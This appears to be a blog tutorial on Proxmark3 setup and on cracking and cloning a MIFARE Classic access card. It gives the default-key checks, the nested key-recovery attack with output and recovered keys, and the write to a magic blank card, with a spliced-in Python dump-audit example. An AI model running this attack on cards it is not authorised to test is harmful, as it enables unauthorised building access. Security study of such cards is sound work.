PM3 environment setup
Setting up the environment on Windows is rather troublesome; a virtual machine works if you have one, but I strongly recommend WSL (Windows Subsystem for Linux), which is very friendly.
Below is the Ubuntu-based setup, following the PM3 Wiki.
First check for updates:
sudo apt-get update && sudo apt-get upgrade
Then install the required dependencies:
sudo apt install p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libstdc++-arm-none-eabi-newlib libpcsclite-dev pcscd
Pull the source:
git clone https://github.com/proxmark/proxmark3.git
Third-party firmware such as Iceman's can of course be used instead:
git clone https://github.com/RfidResearchGroup/proxmark3.git
Then fetch the latest content and configure the udev rules and serial-port permissions:
cd proxmark3
git pull
sudo cp -rf driver/77-mm-usb-device-blacklist.rules /etc/udev/rules.d/77-mm-usb-device-blacklist.rules
sudo udevadm control --reload-rules
sudo adduser $USER dialout
Compile the sources:
make clean && make all
Now the PM3 can be plugged in. Since I am using WSL, Ubuntu shares the host's serial ports, so the port number must be determined first; mine was COM7, which WSL exposes as /dev/ttyS7, and then it can be connected directly:
sudo ./proxmark3 /dev/ttyS7
M1 card cracking
First identify the card type. Start by looking at the antenna signal with no card present:
proxmark3> hw tune
Measuring antenna characteristics, please wait.........
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
Place the card over the HF antenna and measure the antenna signal again:
Measuring antenna characteristics, please wait.........
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
The HF voltage changes noticeably, so this is a high-frequency card (the same method identifies low-frequency cards from the LF reading). A further command identifies the card specifically as an M1 card:
proxmark3> hf search
UID : 60 64 7d 26
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search
Check whether the sectors use default keys:
proxmark3> hf mf chk *1 ? t
--chk keys. sectors:16, block no: 0, key type:?, eml:y, dmp=n checktimeout=471 us
No key specified, trying default keys
chk default key[ 0] ffffffffffff
chk default key[ 1] 000000000000
chk default key[ 2] a0a1a2a3a4a5
chk default key[ 3] b0b1b2b3b4b5
chk default key[ 4] aabbccddeeff
chk default key[ 5] 1a2b3c4d5e6f
chk default key[ 6] 123456789abc
chk default key[ 7] 010203040506
chk default key[ 8] 123456abcdef
chk default key[ 9] abcdef123456
chk default key[10] 4d3a99c351dd
chk default key[11] 1a982c7e459a
chk default key[12] d3f7d3f7d3f7
chk default key[13] 714c5c886e97
chk default key[14] 587ee5f9350f
chk default key[15] a0478cc39091
chk default key[16] 533cb6c723f6
chk default key[17] 8fd0a4f256e9
To cancel this operation press the button on the proxmark...
--o
|---|----------------|----------------|
|sec|key A |key B |
|---|----------------|----------------|
|000| ffffffffffff | ffffffffffff |
|001| ? | ? |
|002| ffffffffffff | ffffffffffff |
|003| ? | ? |
|004| ffffffffffff | ffffffffffff |
|005| ffffffffffff | ffffffffffff |
|006| ffffffffffff | ffffffffffff |
|007| ffffffffffff | ffffffffffff |
|008| ffffffffffff | ffffffffffff |
|009| ffffffffffff | ffffffffffff |
|010| ffffffffffff | ffffffffffff |
|011| ffffffffffff | ffffffffffff |
|012| ffffffffffff | ffffffffffff |
|013| ffffffffffff | ffffffffffff |
|014| ffffffffffff | ffffffffffff |
|015| ffffffffffff | ffffffffffff |
|---|----------------|----------------|
28 keys(s) found have been transferred to the emulator memory
For detailed usage of each command, consult its help.
Some sectors are found to use the default key ffffffffffff.
M1 cards have a vulnerability (exploited by the nested attack) by which the key of an encrypted sector can be recovered from the key of an already known sector:
proxmark3> hf mf nested 1 0 A FFFFFFFFFFFF d
--nested. sectors:16, block no: 0, key type:A, eml:n, dmp=y checktimeout=471 us
Testing known keys. Sector count=16
nested...
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=1
Setting authentication timeout to 103us
Found valid key:01206f340100
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=0
Setting authentication timeout to 103us
Found valid key:112233445566
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
Found valid key:50f6a442e26d
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
Found valid key:e59925b18b43
-----------------------------------------------
Nested statistic:
Iterations count: 17
Time in nested: 8.851 (0.521 sec per key)
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| ffffffffffff | 1 | ffffffffffff | 1 |
|001| 112233445566 | 1 | 01206f340100 | 1 |
|002| ffffffffffff | 1 | ffffffffffff | 1 |
|003| 50f6a442e26d | 1 | e59925b18b43 | 1 |
|004| ffffffffffff | 1 | ffffffffffff | 1 |
|005| ffffffffffff | 1 | ffffffffffff | 1 |
|006| ffffffffffff | 1 | ffffffffffff | 1 |
|007| ffffffffffff | 1 | ffffffffffff | 1 |
|008| ffffffffffff | 1 | ffffffffffff | 1 |
|009| ffffffffffff | 1 | ffffffffffff | 1 |
|010| ffffffffffff | 1 | ffffffffffff | 1 |
|011| ffffffffffff | 1 | ffffffffffff | 1 |
|012| ffffffffffff | 1 | ffffffffffff | 1 |
|013| ffffffffffff | 1 | ffffffffffff | 1 |
|014| ffffffffffff | 1 | ffffffffffff | 1 |
|015| ffffffffffff | 1 | ffffffffffff | 1 |
|---|----------------|---|----------------|---|
Printing keys to binary file dumpkeys.bin...
The keys of the remaining encrypted sectors have been recovered and written to dumpkeys.bin. That file must be converted into a format PM3 understands before the access card can be copied:
proxmark3> script run dumptoemul.lua
--- Executing: ./scripts/dumptoemul.lua, args''
Wrote an emulator-dump to the file 2CF0550B.eml
-----Finished
proxmark3>
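The .eml written above is a plain-text dump, one 16-byte block per line. Below is an added example (not part of the original post or of the Proxmark3 project) that parses such a dump and reports sectors whose trailer is still weak, i.e. protected by a default key from the `hf mf chk` list, carrying an inconsistent access-bit field, or configured so that key B is readable with key A; the 4-sector sample dump is constructed, and the access-condition table is taken from the MIFARE Classic datasheet as noted in the comments.

```python
# Added example: audit a Proxmark3 .eml dump of a MIFARE Classic 1K card.
# Block 4s+3 is sector s's trailer: key A (6) | access bits (3) | user (1) | key B (6).

# Subset of the default keys that `hf mf chk` tried above.
DEFAULT_KEYS = {"ffffffffffff", "000000000000", "a0a1a2a3a4a5", "b0b1b2b3b4b5",
                "aabbccddeeff", "1a2b3c4d5e6f", "123456789abc", "d3f7d3f7d3f7"}

def parse_eml(text):
    """Return the dump as 16-byte blocks, rejecting malformed lines."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if any(len(ln) != 32 for ln in lines):
        raise ValueError("every .eml line must be exactly 32 hex chars")
    return [bytes.fromhex(ln) for ln in lines]

def access_bits_consistent(t):
    """Bytes 6-8 hold C1..C3 plus inverted copies; a mismatch is a corrupt trailer."""
    c1, c2, c3 = t[7] >> 4, t[8] & 0xF, t[8] >> 4
    return (t[6] & 0xF, t[6] >> 4, t[7] & 0xF) == (~c1 & 0xF, ~c2 & 0xF, ~c3 & 0xF)

def key_b_readable(t):
    """Datasheet trailer conditions 000, 010 and 001 (transport) let key A read key B."""
    cond = ((t[7] >> 7) & 1, (t[8] >> 3) & 1, (t[8] >> 7) & 1)
    return cond in {(0, 0, 0), (0, 1, 0), (0, 0, 1)}

def audit(blocks):
    """Map sector number -> list of findings, for the sectors that have any."""
    findings = {}
    for s in range(len(blocks) // 4):
        t, issues = blocks[4 * s + 3], []
        for name, key in (("A", t[:6].hex()), ("B", t[10:].hex())):
            if key in DEFAULT_KEYS:
                issues.append(f"key {name} is a well-known default ({key})")
        if not access_bits_consistent(t):
            issues.append("access bits inconsistent (corrupt trailer)")
        elif key_b_readable(t):
            issues.append("key B readable with key A, so it adds no protection")
        if issues:
            findings[s] = issues
    return findings

# Constructed sample: sectors 0 and 2 in transport configuration, sector 1 with
# custom keys and a locked trailer, sector 3 with custom keys but corrupt access bits.
EMPTY = "00" * 16
SAMPLE_EML = "\n".join([
    "60647d265f080400" + "00" * 8, EMPTY, EMPTY, "ffffffffffff" + "ff078069" + "ffffffffffff",
    EMPTY, EMPTY, EMPTY, "112233445566" + "78778800" + "01206f340100",
    EMPTY, EMPTY, EMPTY, "ffffffffffff" + "ff078069" + "ffffffffffff",
    EMPTY, EMPTY, EMPTY, "50f6a442e26d" + "ff078169" + "e59925b18b43",
])
```

Running `audit(parse_eml(SAMPLE_EML))` flags sectors 0, 2 and 3 and leaves sector 1 clean; a trailer flagged as inconsistent must never be written back to a card, since the chip would lock that sector permanently.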
Then place the blank card over the HF antenna and write the data into it:
proxmark3> hf mf cload 60647D26
Chinese magic backdoor commands (GEN 1a) detected
Loading magic mifare 1K
Loaded from file: 60647D26.eml
Done!!!
References:
https://github.com/Proxmark/proxmark3/wiki/Ubuntu-Linux
https://www.cnblogs.com/k1two2/p/5706516.html
https://lzy-wi.github.io/2018/07/26/proxmark3/